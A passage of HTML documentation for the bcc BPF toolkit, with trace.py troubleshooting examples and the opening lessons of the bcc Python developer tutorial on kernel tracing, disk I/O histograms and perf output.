||
<li>trace</li>
|
||
<li>argdist</li>
|
||
<li>funccount</li>
|
||
</ol>
|
||
<p>These generic tools may be useful to provide visibility to solve your specific problems.</p>
|
||
<h4 id="21-trace"><a class="header" href="#21-trace">2.1. trace</a></h4>
|
||
<h5 id="example-1"><a class="header" href="#example-1">Example 1</a></h5>
|
||
<p>Suppose you want to track file ownership change. There are three syscalls, <code>chown</code>, <code>fchown</code> and <code>lchown</code> which users can use to change file ownership. The corresponding syscall entry is <code>SyS_[f|l]chown</code>. The following command can be used to print out syscall parameters and the calling process user id. You can use <code>id</code> command to find the uid of a particular user.</p>
|
||
<pre><code class="language-sh">$ trace.py \
|
||
'p::SyS_chown "file = %s, to_uid = %d, to_gid = %d, from_uid = %d", arg1, arg2, arg3, $uid' \
|
||
'p::SyS_fchown "fd = %d, to_uid = %d, to_gid = %d, from_uid = %d", arg1, arg2, arg3, $uid' \
|
||
'p::SyS_lchown "file = %s, to_uid = %d, to_gid = %d, from_uid = %d", arg1, arg2, arg3, $uid'
|
||
PID TID COMM FUNC -
|
||
1269255 1269255 python3.6 SyS_lchown file = /tmp/dotsync-usisgezu/tmp, to_uid = 128203, to_gid = 100, from_uid = 128203
|
||
1269441 1269441 zstd SyS_chown file = /tmp/dotsync-vic7ygj0/dotsync-package.zst, to_uid = 128203, to_gid = 100, from_uid = 128203
|
||
1269255 1269255 python3.6 SyS_lchown file = /tmp/dotsync-a40zd7ev/tmp, to_uid = 128203, to_gid = 100, from_uid = 128203
|
||
1269442 1269442 zstd SyS_chown file = /tmp/dotsync-gzp413o_/dotsync-package.zst, to_uid = 128203, to_gid = 100, from_uid = 128203
|
||
1269255 1269255 python3.6 SyS_lchown file = /tmp/dotsync-whx4fivm/tmp/.bash_profile, to_uid = 128203, to_gid = 100, from_uid = 128203
|
||
</code></pre>
|
||
<h5 id="example-2"><a class="header" href="#example-2">Example 2</a></h5>
|
||
<p>Suppose you want to count nonvoluntary context switches (<code>nvcsw</code>) in your bpf based performance monitoring tools and you do not know what the proper method is. <code>/proc/<pid>/status</code> already tells you the number (<code>nonvoluntary_ctxt_switches</code>) for a pid, and you can use <code>trace.py</code> to do a quick experiment to verify your method. According to the kernel source code, <code>nvcsw</code> is counted in function <code>__schedule</code> of file <code>linux/kernel/sched/core.c</code>, under the condition</p>
|
||
<pre><code class="language-c">!(!preempt && prev->state) // i.e., preempt || !prev->state
|
||
</code></pre>
|
||
<p>The <code>__schedule</code> function is marked as <code>notrace</code>, so the best place to evaluate the above condition seems to be the <code>sched/sched_switch</code> tracepoint, which is called inside function <code>__schedule</code> and defined in <code>linux/include/trace/events/sched.h</code>. <code>trace.py</code> already provides <code>args</code> as a pointer to the tracepoint's <code>TP_STRUCT__entry</code>. The above condition in function <code>__schedule</code> can be represented as</p>
|
||
<pre><code class="language-c">args->prev_state == TASK_STATE_MAX || args->prev_state == 0
|
||
</code></pre>
|
||
<p>The below command can be used to count the involuntary context switches (per process or per pid) and compare to <code>/proc/<pid>/status</code> or <code>/proc/<pid>/task/<task_id>/status</code> for correctness, as in typical cases, involuntary context switches are not very common.</p>
|
||
<pre><code class="language-sh">$ trace.py -p 1134138 't:sched:sched_switch (args->prev_state == TASK_STATE_MAX || args->prev_state == 0)'
|
||
PID TID COMM FUNC
|
||
1134138 1134140 contention_test sched_switch
|
||
1134138 1134142 contention_test sched_switch
|
||
...
|
||
$ trace.py -L 1134140 't:sched:sched_switch (args->prev_state == TASK_STATE_MAX || args->prev_state == 0)'
|
||
PID TID COMM FUNC
|
||
1134138 1134140 contention_test sched_switch
|
||
1134138 1134140 contention_test sched_switch
|
||
...
|
||
</code></pre>
|
||
<h5 id="example-3"><a class="header" href="#example-3">Example 3</a></h5>
|
||
<p>This example is related to issue <a href="https://github.com/iovisor/bcc/issues/1231">1231</a> and <a href="https://github.com/iovisor/bcc/issues/1516">1516</a> where uprobe does not work at all in certain cases. First, you can do a <code>strace</code> as below</p>
|
||
<pre><code class="language-sh">$ strace trace.py 'r:bash:readline "%s", retval'
|
||
...
|
||
perf_event_open(0x7ffd968212f0, -1, 0, -1, 0x8 /* PERF_FLAG_??? */) = -1 EIO (Input/output error)
|
||
...
|
||
</code></pre>
|
||
<p>The <code>perf_event_open</code> syscall returns <code>-EIO</code>. Searching for <code>EIO</code> in the kernel's uprobe-related code under the <code>/kernel/trace</code> and <code>/kernel/events</code> directories shows that the function <code>uprobe_register</code> is the most suspicious. Let us find out whether this function is called and, if it is, what its return value is. In one terminal, use the following command to print out the return value of uprobe_register:</p>
|
||
<pre><code class="language-sh">$ trace.py 'r::uprobe_register "ret = %d", retval'
|
||
</code></pre>
|
||
<p>In another terminal run the same bash uretprobe tracing example, and you should get</p>
|
||
<pre><code class="language-sh">$ trace.py 'r::uprobe_register "ret = %d", retval'
|
||
PID TID COMM FUNC -
|
||
1041401 1041401 python2.7 uprobe_register ret = -5
|
||
</code></pre>
|
||
<p>The <code>-5</code> error code is EIO. This confirms that the following code in function <code>uprobe_register</code> is the most suspicious culprit.</p>
|
||
<pre><code class="language-c"> if (!inode->i_mapping->a_ops->readpage && !shmem_mapping(inode->i_mapping))
|
||
return -EIO;
|
||
</code></pre>
|
||
<p>The <code>shmem_mapping</code> function is defined as</p>
|
||
<pre><code class="language-c">bool shmem_mapping(struct address_space *mapping)
|
||
{
|
||
return mapping->a_ops == &shmem_aops;
|
||
}
|
||
</code></pre>
|
||
<p>To confirm the theory, find out what <code>inode->i_mapping->a_ops</code> is with the following command</p>
|
||
<pre><code class="language-sh">$ trace.py -I 'linux/fs.h' 'p::uprobe_register(struct inode *inode) "a_ops = %llx", inode->i_mapping->a_ops'
|
||
PID TID COMM FUNC -
|
||
814288 814288 python2.7 uprobe_register a_ops = ffffffff81a2adc0
|
||
^C$ grep ffffffff81a2adc0 /proc/kallsyms
|
||
ffffffff81a2adc0 R empty_aops
|
||
</code></pre>
|
||
<p>The kernel symbol <code>empty_aops</code> does not have <code>readpage</code> defined and hence the above suspicious condition is true. Further examining the kernel source code shows that <code>overlayfs</code> does not provide its own <code>a_ops</code> while some other file systems (e.g., ext4) define their own <code>a_ops</code> (e.g., <code>ext4_da_aops</code>), and <code>ext4_da_aops</code> defines <code>readpage</code>. Hence, uprobe works fine on ext4 while not on overlayfs.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/trace_example.txt">examples</a>.</p>
|
||
<h4 id="22-argdist"><a class="header" href="#22-argdist">2.2. argdist</a></h4>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/argdist_example.txt">examples</a>.</p>
|
||
<h4 id="23-funccount"><a class="header" href="#23-funccount">2.3. funccount</a></h4>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/funccount_example.txt">examples</a>.</p>
|
||
<h2 id="networking"><a class="header" href="#networking">Networking</a></h2>
|
||
<p>To do.</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="bcc-python-developer-tutorial"><a class="header" href="#bcc-python-developer-tutorial">bcc Python Developer Tutorial</a></h1>
|
||
<p>This tutorial is about developing <a href="https://github.com/iovisor/bcc">bcc</a> tools and programs using the Python interface. There are two parts: observability then networking. Snippets are taken from various programs in bcc: see their files for licences.</p>
|
||
<p>Also see the bcc developer's <a href="bcc-documents/reference_guide.html">reference_guide.md</a>, and a tutorial for end-users of tools: <a href="bcc-documents/tutorial.html">tutorial.md</a>. There is also a lua interface for bcc.</p>
|
||
<h2 id="observability-1"><a class="header" href="#observability-1">Observability</a></h2>
|
||
<p>This observability tutorial contains 17 lessons, and 46 enumerated things to learn.</p>
|
||
<h3 id="lesson-1-hello-world"><a class="header" href="#lesson-1-hello-world">Lesson 1. Hello World</a></h3>
|
||
<p>Start by running <a href="https://github.com/iovisor/bcc/tree/master/examples/hello_world.py">examples/hello_world.py</a>, while running some commands (eg, "ls") in another session. It should print "Hello, World!" for new processes. If not, start by fixing bcc: see <a href="https://github.com/iovisor/bcc/tree/master/INSTALL.md">INSTALL.md</a>.</p>
|
||
<pre><code class="language-sh"># ./examples/hello_world.py
|
||
bash-13364 [002] d... 24573433.052937: : Hello, World!
|
||
bash-13364 [003] d... 24573436.642808: : Hello, World!
|
||
[...]
|
||
</code></pre>
|
||
<p>Here's the code for hello_world.py:</p>
|
||
<pre><code class="language-Python">from bcc import BPF
|
||
BPF(text='int kprobe__sys_clone(void *ctx) { bpf_trace_printk("Hello, World!\\n"); return 0; }').trace_print()
|
||
</code></pre>
|
||
<p>There are six things to learn from this:</p>
|
||
<ol>
|
||
<li>
|
||
<p><code>text='...'</code>: This defines a BPF program inline. The program is written in C.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>kprobe__sys_clone()</code>: This is a short-cut for kernel dynamic tracing via kprobes. If the C function begins with <code>kprobe__</code>, the rest is treated as a kernel function name to instrument, in this case, <code>sys_clone()</code>.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>void *ctx</code>: ctx has arguments, but since we aren't using them here, we'll just cast it to <code>void *</code>.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>bpf_trace_printk()</code>: A simple kernel facility for printf() to the common trace_pipe (/sys/kernel/debug/tracing/trace_pipe). This is ok for some quick examples, but has limitations: 3 args max, 1 %s only, and trace_pipe is globally shared, so concurrent programs will have clashing output. A better interface is via BPF_PERF_OUTPUT(), covered later.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>return 0;</code>: Necessary formality (if you want to know why, see <a href="https://github.com/iovisor/bcc/issues/139">#139</a>).</p>
|
||
</li>
|
||
<li>
|
||
<p><code>.trace_print()</code>: A bcc routine that reads trace_pipe and prints the output.</p>
|
||
</li>
|
||
</ol>
|
||
<h3 id="lesson-2-sys_sync"><a class="header" href="#lesson-2-sys_sync">Lesson 2. sys_sync()</a></h3>
|
||
<p>Write a program that traces the sys_sync() kernel function. Print "sys_sync() called" when it runs. Test by running <code>sync</code> in another session while tracing. The hello_world.py program has everything you need for this.</p>
|
||
<p>Improve it by printing "Tracing sys_sync()... Ctrl-C to end." when the program first starts. Hint: it's just Python.</p>
|
||
<h3 id="lesson-3-hello_fieldspy"><a class="header" href="#lesson-3-hello_fieldspy">Lesson 3. hello_fields.py</a></h3>
|
||
<p>This program is in <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/hello_fields.py">examples/tracing/hello_fields.py</a>. Sample output (run commands in another session):</p>
|
||
<pre><code class="language-sh"># examples/tracing/hello_fields.py
|
||
TIME(s) COMM PID MESSAGE
|
||
24585001.174885999 sshd 1432 Hello, World!
|
||
24585001.195710000 sshd 15780 Hello, World!
|
||
24585001.991976000 systemd-udevd 484 Hello, World!
|
||
24585002.276147000 bash 15787 Hello, World!
|
||
</code></pre>
|
||
<p>Code:</p>
|
||
<pre><code class="language-Python">from bcc import BPF
|
||
|
||
# define BPF program
|
||
prog = """
|
||
int hello(void *ctx) {
|
||
bpf_trace_printk("Hello, World!\\n");
|
||
return 0;
|
||
}
|
||
"""
|
||
|
||
# load BPF program
|
||
b = BPF(text=prog)
|
||
b.attach_kprobe(event=b.get_syscall_fnname("clone"), fn_name="hello")
|
||
|
||
# header
|
||
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "MESSAGE"))
|
||
|
||
# format output
|
||
while 1:
|
||
try:
|
||
(task, pid, cpu, flags, ts, msg) = b.trace_fields()
|
||
except ValueError:
|
||
continue
|
||
print("%-18.9f %-16s %-6d %s" % (ts, task, pid, msg))
|
||
</code></pre>
|
||
<p>This is similar to hello_world.py, and traces new processes via sys_clone() again, but has a few more things to learn:</p>
|
||
<ol>
|
||
<li>
|
||
<p><code>prog =</code>: This time we declare the C program as a variable, and later refer to it. This is useful if you want to add some string substitutions based on command line arguments.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>hello()</code>: Now we're just declaring a C function, instead of the <code>kprobe__</code> shortcut. We'll refer to this later. All C functions declared in the BPF program are expected to be executed on a probe, hence they all need to take a <code>struct pt_regs *ctx</code> as first argument. If you need to define a helper function that will not be executed on a probe, it needs to be defined as <code>static inline</code> in order to be inlined by the compiler. Sometimes you would also need to add the <code>__always_inline</code> function attribute to it.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>b.attach_kprobe(event=b.get_syscall_fnname("clone"), fn_name="hello")</code>: Creates a kprobe for the kernel clone system call function, which will execute our defined hello() function. You can call attach_kprobe() more than once, and attach your C function to multiple kernel functions.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>b.trace_fields()</code>: Returns a fixed set of fields from trace_pipe. Similar to trace_print(), this is handy for hacking, but for real tooling we should switch to BPF_PERF_OUTPUT().</p>
|
||
</li>
|
||
</ol>
|
||
<h3 id="lesson-4-sync_timingpy"><a class="header" href="#lesson-4-sync_timingpy">Lesson 4. sync_timing.py</a></h3>
|
||
<p>Remember the days of sysadmins typing <code>sync</code> three times on a slow console before <code>reboot</code>, to give the first asynchronous sync time to complete? Then someone thought <code>sync;sync;sync</code> was clever, to run them all on one line, which became industry practice despite defeating the original purpose! And then sync became synchronous, so more reasons it was silly. Anyway.</p>
|
||
<p>The following example times how quickly the <code>do_sync</code> function is called, and prints output if it has been called more recently than one second ago. A <code>sync;sync;sync</code> will print output for the 2nd and 3rd sync's:</p>
|
||
<pre><code class="language-sh"># examples/tracing/sync_timing.py
|
||
Tracing for quick sync's... Ctrl-C to end
|
||
At time 0.00 s: multiple syncs detected, last 95 ms ago
|
||
At time 0.10 s: multiple syncs detected, last 96 ms ago
|
||
</code></pre>
|
||
<p>This program is <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/sync_timing.py">examples/tracing/sync_timing.py</a>:</p>
|
||
<pre><code class="language-Python">from __future__ import print_function
|
||
from bcc import BPF
|
||
|
||
# load BPF program
|
||
b = BPF(text="""
|
||
#include <uapi/linux/ptrace.h>
|
||
|
||
BPF_HASH(last);
|
||
|
||
int do_trace(struct pt_regs *ctx) {
|
||
u64 ts, *tsp, delta, key = 0;
|
||
|
||
// attempt to read stored timestamp
|
||
tsp = last.lookup(&key);
|
||
if (tsp != NULL) {
|
||
delta = bpf_ktime_get_ns() - *tsp;
|
||
if (delta < 1000000000) {
|
||
// output if time is less than 1 second
|
||
bpf_trace_printk("%d\\n", delta / 1000000);
|
||
}
|
||
last.delete(&key);
|
||
}
|
||
|
||
// update stored timestamp
|
||
ts = bpf_ktime_get_ns();
|
||
last.update(&key, &ts);
|
||
return 0;
|
||
}
|
||
""")
|
||
|
||
b.attach_kprobe(event=b.get_syscall_fnname("sync"), fn_name="do_trace")
|
||
print("Tracing for quick sync's... Ctrl-C to end")
|
||
|
||
# format output
|
||
start = 0
|
||
while 1:
|
||
(task, pid, cpu, flags, ts, ms) = b.trace_fields()
|
||
if start == 0:
|
||
start = ts
|
||
ts = ts - start
|
||
print("At time %.2f s: multiple syncs detected, last %s ms ago" % (ts, ms))
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>bpf_ktime_get_ns()</code>: Returns the time as nanoseconds.</li>
|
||
<li><code>BPF_HASH(last)</code>: Creates a BPF map object that is a hash (associative array), called "last". We didn't specify any further arguments, so it defaults to key and value types of u64.</li>
|
||
<li><code>key = 0</code>: We'll only store one key/value pair in this hash, where the key is hardwired to zero.</li>
|
||
<li><code>last.lookup(&key)</code>: Lookup the key in the hash, and return a pointer to its value if it exists, else NULL. We pass the key in by address, i.e. as a pointer to the key.</li>
|
||
<li><code>if (tsp != NULL) {</code>: The verifier requires that pointer values derived from a map lookup must be checked for a null value before they can be dereferenced and used.</li>
|
||
<li><code>last.delete(&key)</code>: Delete the key from the hash. This is currently required because of <a href="https://git.kernel.org/cgit/linux/kernel/git/davem/net.git/commit/?id=a6ed3ea65d9868fdf9eff84e6fe4f666b8d14b02">a kernel bug in <code>.update()</code></a> (fixed in 4.8.10).</li>
|
||
<li><code>last.update(&key, &ts)</code>: Associate the value in the 2nd argument to the key, overwriting any previous value. This records the timestamp.</li>
|
||
</ol>
|
||
<h3 id="lesson-5-sync_countpy"><a class="header" href="#lesson-5-sync_countpy">Lesson 5. sync_count.py</a></h3>
|
||
<p>Modify the sync_timing.py program (prior lesson) to store the count of all kernel sync system calls (both fast and slow), and print it with the output. This count can be recorded in the BPF program by adding a new key index to the existing hash.</p>
|
||
<h3 id="lesson-6-disksnooppy"><a class="header" href="#lesson-6-disksnooppy">Lesson 6. disksnoop.py</a></h3>
|
||
<p>Browse the <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/disksnoop.py">examples/tracing/disksnoop.py</a> program to see what is new. Here is some sample output:</p>
|
||
<pre><code class="language-sh"># disksnoop.py
|
||
TIME(s) T BYTES LAT(ms)
|
||
16458043.436012 W 4096 3.13
|
||
16458043.437326 W 4096 4.44
|
||
16458044.126545 R 4096 42.82
|
||
16458044.129872 R 4096 3.24
|
||
[...]
|
||
</code></pre>
|
||
<p>And a code snippet:</p>
|
||
<pre><code class="language-Python">[...]
|
||
REQ_WRITE = 1 # from include/linux/blk_types.h
|
||
|
||
# load BPF program
|
||
b = BPF(text="""
|
||
#include <uapi/linux/ptrace.h>
|
||
#include <linux/blk-mq.h>
|
||
|
||
BPF_HASH(start, struct request *);
|
||
|
||
void trace_start(struct pt_regs *ctx, struct request *req) {
|
||
// stash start timestamp by request ptr
|
||
u64 ts = bpf_ktime_get_ns();
|
||
|
||
start.update(&req, &ts);
|
||
}
|
||
|
||
void trace_completion(struct pt_regs *ctx, struct request *req) {
|
||
u64 *tsp, delta;
|
||
|
||
tsp = start.lookup(&req);
|
||
if (tsp != 0) {
|
||
delta = bpf_ktime_get_ns() - *tsp;
|
||
bpf_trace_printk("%d %x %d\\n", req->__data_len,
|
||
req->cmd_flags, delta / 1000);
|
||
start.delete(&req);
|
||
}
|
||
}
|
||
""")
|
||
if BPF.get_kprobe_functions(b'blk_start_request'):
|
||
b.attach_kprobe(event="blk_start_request", fn_name="trace_start")
|
||
b.attach_kprobe(event="blk_mq_start_request", fn_name="trace_start")
|
||
if BPF.get_kprobe_functions(b'__blk_account_io_done'):
|
||
b.attach_kprobe(event="__blk_account_io_done", fn_name="trace_completion")
|
||
else:
|
||
b.attach_kprobe(event="blk_account_io_done", fn_name="trace_completion")
|
||
[...]
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>REQ_WRITE</code>: We're defining a kernel constant in the Python program because we'll use it there later. If we were using REQ_WRITE in the BPF program, it should just work (without needing to be defined) with the appropriate #includes.</li>
|
||
<li><code>trace_start(struct pt_regs *ctx, struct request *req)</code>: This function will later be attached to kprobes. The arguments to kprobe functions are <code>struct pt_regs *ctx</code>, for registers and BPF context, and then the actual arguments to the function. We'll attach this to blk_start_request(), where the first argument is <code>struct request *</code>.</li>
|
||
<li><code>start.update(&req, &ts)</code>: We're using the pointer to the request struct as a key in our hash. What? This is commonplace in tracing. Pointers to structs turn out to be great keys, as they are unique: two structs can't have the same pointer address. (Just be careful about when it gets free'd and reused.) So what we're really doing is tagging the request struct, which describes the disk I/O, with our own timestamp, so that we can time it. There are two common keys used for storing timestamps: pointers to structs, and thread IDs (for timing function entry to return).</li>
|
||
<li><code>req->__data_len</code>: We're dereferencing members of <code>struct request</code>. See its definition in the kernel source for what members are there. bcc actually rewrites these expressions to be a series of <code>bpf_probe_read_kernel()</code> calls. Sometimes bcc can't handle a complex dereference, and you need to call <code>bpf_probe_read_kernel()</code> directly.</li>
|
||
</ol>
|
||
<p>This is a pretty interesting program, and if you can understand all the code, you'll understand many important basics. We're still using the bpf_trace_printk() hack, so let's fix that next.</p>
|
||
<h3 id="lesson-7-hello_perf_outputpy"><a class="header" href="#lesson-7-hello_perf_outputpy">Lesson 7. hello_perf_output.py</a></h3>
|
||
<p>Let's finally stop using bpf_trace_printk() and use the proper BPF_PERF_OUTPUT() interface. This will also mean we stop getting the free trace_fields() members like PID and timestamp, and will need to fetch them directly. Sample output while commands are run in another session:</p>
|
||
<pre><code class="language-sh"># hello_perf_output.py
|
||
TIME(s) COMM PID MESSAGE
|
||
0.000000000 bash 22986 Hello, perf_output!
|
||
0.021080275 systemd-udevd 484 Hello, perf_output!
|
||
0.021359520 systemd-udevd 484 Hello, perf_output!
|
||
0.021590610 systemd-udevd 484 Hello, perf_output!
|
||
[...]
|
||
</code></pre>
|
||
<p>Code is <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/hello_perf_output.py">examples/tracing/hello_perf_output.py</a>:</p>
|
||
<pre><code class="language-Python">from bcc import BPF
|
||
|
||
# define BPF program
|
||
prog = """
|
||
#include <linux/sched.h>
|
||
|
||
// define output data structure in C
|
||
struct data_t {
|
||
u32 pid;
|
||
u64 ts;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
BPF_PERF_OUTPUT(events);
|
||
|
||
int hello(struct pt_regs *ctx) {
|
||
struct data_t data = {};
|
||
|
||
data.pid = bpf_get_current_pid_tgid();
|
||
data.ts = bpf_ktime_get_ns();
|
||
bpf_get_current_comm(&data.comm, sizeof(data.comm));
|
||
|
||
events.perf_submit(ctx, &data, sizeof(data));
|
||
|
||
return 0;
|
||
}
|
||
"""
|
||
|
||
# load BPF program
|
||
b = BPF(text=prog)
|
||
b.attach_kprobe(event=b.get_syscall_fnname("clone"), fn_name="hello")
|
||
|
||
# header
|
||
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "MESSAGE"))
|
||
|
||
# process event
|
||
start = 0
|
||
def print_event(cpu, data, size):
|
||
global start
|
||
event = b["events"].event(data)
|
||
if start == 0:
|
||
start = event.ts
|
||
time_s = (float(event.ts - start)) / 1000000000
|
||
print("%-18.9f %-16s %-6d %s" % (time_s, event.comm, event.pid,
|
||
"Hello, perf_output!"))
|
||
|
||
# loop with callback to print_event
|
||
b["events"].open_perf_buffer(print_event)
|
||
while 1:
|
||
b.perf_buffer_poll()
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>struct data_t</code>: This defines the C struct we'll use to pass data from kernel to user space.</li>
|
||
<li><code>BPF_PERF_OUTPUT(events)</code>: This names our output channel "events".</li>
|
||
<li><code>struct data_t data = {};</code>: Create an empty data_t struct that we'll then populate.</li>
|
||
<li><code>bpf_get_current_pid_tgid()</code>: Returns the process ID in the lower 32 bits (kernel's view of the PID, which in user space is usually presented as the thread ID), and the thread group ID in the upper 32 bits (what user space often thinks of as the PID). By directly setting this to a u32, we discard the upper 32 bits. Should you be presenting the PID or the TGID? For a multi-threaded app, the TGID will be the same, so you need the PID to differentiate them, if that's what you want. It's also a question of expectations for the end user.</li>
|
||
<li><code>bpf_get_current_comm()</code>: Populates the first argument address with the current process name.</li>
|
||
<li><code>events.perf_submit()</code>: Submit the event for user space to read via a perf ring buffer.</li>
|
||
<li><code>def print_event()</code>: Define a Python function that will handle reading events from the <code>events</code> stream.</li>
|
||
<li><code>b["events"].event(data)</code>: Now get the event as a Python object, auto-generated from the C declaration.</li>
|
||
<li><code>b["events"].open_perf_buffer(print_event)</code>: Associate the Python <code>print_event</code> function with the <code>events</code> stream.</li>
|
||
<li><code>while 1: b.perf_buffer_poll()</code>: Block waiting for events.</li>
|
||
</ol>
|
||
<h3 id="lesson-8-sync_perf_outputpy"><a class="header" href="#lesson-8-sync_perf_outputpy">Lesson 8. sync_perf_output.py</a></h3>
|
||
<p>Rewrite sync_timing.py, from a prior lesson, to use <code>BPF_PERF_OUTPUT</code>.</p>
|
||
<h3 id="lesson-9-bitehistpy"><a class="header" href="#lesson-9-bitehistpy">Lesson 9. bitehist.py</a></h3>
|
||
<p>The following tool records a histogram of disk I/O sizes. Sample output:</p>
|
||
<pre><code class="language-sh"># bitehist.py
|
||
Tracing... Hit Ctrl-C to end.
|
||
^C
|
||
kbytes : count distribution
|
||
0 -> 1 : 3 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 211 |********** |
|
||
8 -> 15 : 0 | |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 1 | |
|
||
128 -> 255 : 800 |**************************************|
|
||
</code></pre>
|
||
<p>Code is <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/bitehist.py">examples/tracing/bitehist.py</a>:</p>
|
||
<pre><code class="language-Python">from __future__ import print_function
|
||
from bcc import BPF
|
||
from time import sleep
|
||
|
||
# load BPF program
|
||
b = BPF(text="""
|
||
#include <uapi/linux/ptrace.h>
|
||
#include <linux/blkdev.h>
|
||
|
||
BPF_HISTOGRAM(dist);
|
||
|
||
int kprobe__blk_account_io_done(struct pt_regs *ctx, struct request *req)
|
||
{
|
||
dist.increment(bpf_log2l(req->__data_len / 1024));
|
||
return 0;
|
||
}
|
||
""")
|
||
|
||
# header
|
||
print("Tracing... Hit Ctrl-C to end.")
|
||
|
||
# trace until Ctrl-C
|
||
try:
|
||
sleep(99999999)
|
||
except KeyboardInterrupt:
|
||
print()
|
||
|
||
# output
|
||
b["dist"].print_log2_hist("kbytes")
|
||
</code></pre>
|
||
<p>A recap from earlier lessons:</p>
|
||
<ul>
|
||
<li><code>kprobe__</code>: This prefix means the rest will be treated as a kernel function name that will be instrumented using kprobe.</li>
|
||
<li><code>struct pt_regs *ctx, struct request *req</code>: Arguments to kprobe. The <code>ctx</code> is registers and BPF context, the <code>req</code> is the first argument to the instrumented function: <code>blk_account_io_done()</code>.</li>
|
||
<li><code>req->__data_len</code>: Dereferencing that member.</li>
|
||
</ul>
|
||
<p>New things to learn:</p>
|
||
<ol>
|
||
<li><code>BPF_HISTOGRAM(dist)</code>: Defines a BPF map object that is a histogram, and names it "dist".</li>
|
||
<li><code>dist.increment()</code>: Increments the histogram bucket at the index provided as the first argument, by one by default. Optionally, a custom increment can be passed as the second argument.</li>
|
||
<li><code>bpf_log2l()</code>: Returns the log-2 of the provided value. This becomes the index of our histogram, so that we're constructing a power-of-2 histogram.</li>
|
||
<li><code>b["dist"].print_log2_hist("kbytes")</code>: Prints the "dist" histogram as power-of-2, with a column header of "kbytes". The only data transferred from kernel to user space is the bucket counts, making this efficient.</li>
|
||
</ol>
|
||
<h3 id="lesson-10-disklatencypy"><a class="header" href="#lesson-10-disklatencypy">Lesson 10. disklatency.py</a></h3>
|
||
<p>Write a program that times disk I/O, and prints a histogram of their latency. Disk I/O instrumentation and timing can be found in the disksnoop.py program from a prior lesson, and histogram code can be found in bitehist.py from a prior lesson.</p>
|
||
<h3 id="lesson-11-vfsreadlatpy"><a class="header" href="#lesson-11-vfsreadlatpy">Lesson 11. vfsreadlat.py</a></h3>
|
||
<p>This example is split into separate Python and C files. Example output:</p>
|
||
<pre><code class="language-sh"># vfsreadlat.py 1
|
||
Tracing... Hit Ctrl-C to end.
|
||
usecs : count distribution
|
||
0 -> 1 : 0 | |
|
||
2 -> 3 : 2 |*********** |
|
||
4 -> 7 : 7 |****************************************|
|
||
8 -> 15 : 4 |********************** |
|
||
|
||
usecs : count distribution
|
||
0 -> 1 : 29 |****************************************|
|
||
2 -> 3 : 28 |************************************** |
|
||
4 -> 7 : 4 |***** |
|
||
8 -> 15 : 8 |*********** |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 0 | |
|
||
128 -> 255 : 0 | |
|
||
256 -> 511 : 2 |** |
|
||
512 -> 1023 : 0 | |
|
||
1024 -> 2047 : 0 | |
|
||
2048 -> 4095 : 0 | |
|
||
4096 -> 8191 : 4 |***** |
|
||
8192 -> 16383 : 6 |******** |
|
||
16384 -> 32767 : 9 |************ |
|
||
32768 -> 65535 : 6 |******** |
|
||
65536 -> 131071 : 2 |** |
|
||
|
||
usecs : count distribution
|
||
0 -> 1 : 11 |****************************************|
|
||
2 -> 3 : 2 |******* |
|
||
4 -> 7 : 10 |************************************ |
|
||
8 -> 15 : 8 |***************************** |
|
||
16 -> 31 : 1 |*** |
|
||
32 -> 63 : 2 |******* |
|
||
[...]
|
||
</code></pre>
|
||
<p>Browse the code in <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/vfsreadlat.py">examples/tracing/vfsreadlat.py</a> and <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/vfsreadlat.c">examples/tracing/vfsreadlat.c</a>. Things to learn:</p>
|
||
<ol>
|
||
<li><code>b = BPF(src_file = "vfsreadlat.c")</code>: Read the BPF C program from a separate source file.</li>
|
||
<li><code>b.attach_kretprobe(event="vfs_read", fn_name="do_return")</code>: Attaches the BPF C function <code>do_return()</code> to the return of the kernel function <code>vfs_read()</code>. This is a kretprobe: instrumenting the return from a function, rather than its entry.</li>
|
||
<li><code>b["dist"].clear()</code>: Clears the histogram.</li>
|
||
</ol>
|
||
<h3 id="lesson-12-urandomreadpy"><a class="header" href="#lesson-12-urandomreadpy">Lesson 12. urandomread.py</a></h3>
|
||
<p>Tracing while a <code>dd if=/dev/urandom of=/dev/null bs=8k count=5</code> is run:</p>
|
||
<pre><code class="language-sh"># urandomread.py
|
||
TIME(s) COMM PID GOTBITS
|
||
24652832.956994001 smtp 24690 384
|
||
24652837.726500999 dd 24692 65536
|
||
24652837.727111001 dd 24692 65536
|
||
24652837.727703001 dd 24692 65536
|
||
24652837.728294998 dd 24692 65536
|
||
24652837.728888001 dd 24692 65536
|
||
</code></pre>
|
||
<p>Hah! I caught smtp by accident. Code is <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/urandomread.py">examples/tracing/urandomread.py</a>:</p>
|
||
<pre><code class="language-Python">from __future__ import print_function
|
||
from bcc import BPF
|
||
|
||
# load BPF program
|
||
b = BPF(text="""
|
||
TRACEPOINT_PROBE(random, urandom_read) {
|
||
// args is from /sys/kernel/debug/tracing/events/random/urandom_read/format
|
||
bpf_trace_printk("%d\\n", args->got_bits);
|
||
